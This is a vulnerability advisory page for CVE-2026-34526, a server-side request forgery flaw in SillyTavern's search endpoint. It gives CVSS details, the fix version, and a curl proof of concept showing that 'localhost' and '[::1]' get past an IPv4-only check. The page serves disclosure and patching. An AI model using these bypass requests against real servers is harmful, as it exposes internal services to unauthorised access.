CVE-2026-34526

Severity: MEDIUM (CVSS 3.1 base score 5.0)
Published: 2026-04-01
Project: https://github.com/SillyTavern/SillyTavern
Advisory: GHSA-wm7j-m6jm-8797

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Changed |
| Confidentiality | Low |
| Integrity | None |
| Availability | None |

Lifecycle Timeline

- CVE Published: Apr 01, 2026 - 21:42 (nvd)
- Analysis Generated: Apr 01, 2026 - 22:16 (vuln.today)
- Patch Released: Apr 02, 2026 - 02:30 (nvd), patch available

Description

### Details

Distinct from CVE-2025-59159 and CVE-2026-26286 (both fixed in v1.16.0). This endpoint remained unpatched in v1.16.0.

In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches a literal dotted-quad IPv4 address (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch:

- `localhost` (a hostname, not a dotted-quad)
- `[::1]` (IPv6 loopback)
- DNS names resolving to internal addresses (e.g. `localtest.me` -> 127.0.0.1)

A separate port check (`urlObj.port !== ''`) rejects any URL that carries an explicit port. That limits exploitation to services on the default ports (80/443) and makes this lower severity than a fully unrestricted SSRF.

### PoC

1. Start SillyTavern v1.16.0 normally.
2. Send the following requests and compare the blocked and bypassed responses (requires a valid session cookie, or CSRF protection disabled):

```bash
# Blocked - dotted-quad matched by regex
curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \
  -H "Content-Type: application/json" \
  -d '{"url": "http://127.0.0.1/", "html": true}'
# Returns: 400 (blocked)

# Bypassed - "localhost" is not dotted-quad
curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \
  -H "Content-Type: application/json" \
  -d '{"url": "http://localhost/", "html": true}'
# Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80)

# Bypassed - IPv6 loopback is not dotted-quad
curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \
  -H "Content-Type: application/json" \
  -d '{"url": "http://[::1]/", "html": true}'
# Returns: 500 (passed validation, fetch attempted)
```

The 400 vs. 500 difference confirms that `localhost` and `[::1]` pass the IP check: the 500 is an ECONNREFUSED from the attempted fetch (nothing listening on port 80 in the test setup), not a validation rejection. Against an internal host that does serve on port 80 or 443, the fetch succeeds and its body is returned to the caller.

### Impact

Server-side request forgery with partial restrictions. An authenticated user can force the server to fetch from internal hosts on default ports (80/443) using hostnames or IPv6 addresses that bypass the IP check. The full response body is returned to the caller. Lower severity than a fully unrestricted SSRF due to the port limitation.

## Resolution

The issue was addressed in version 1.17.0 by improving IPv6 address validation. Since the resolution note names only IPv6 validation while the advisory also lists `localhost` and DNS names that resolve to internal addresses, it is worth re-running the PoC requests for all three cases after upgrading to confirm each is rejected.

Analysis

Server-side request forgery in SillyTavern's search endpoint allows authenticated users to bypass hostname validation and force the server to fetch from internal hosts on default ports (80/443) using alternative hostname representations. The vulnerability exists in v1.16.0 and earlier because the IPv4 validation regex only matches literal dotted-quad notation (e.g., 127.0.0.1), failing to block localhost, IPv6 loopback ([::1]), or DNS names resolving to internal addresses. …


Priority Score

25 (scale: Low / Medium / High / Critical)

- KEV: 0
- EPSS: +0.0
- CVSS: +25
- POC: 0


CVE-2026-34526 vulnerability details – vuln.today
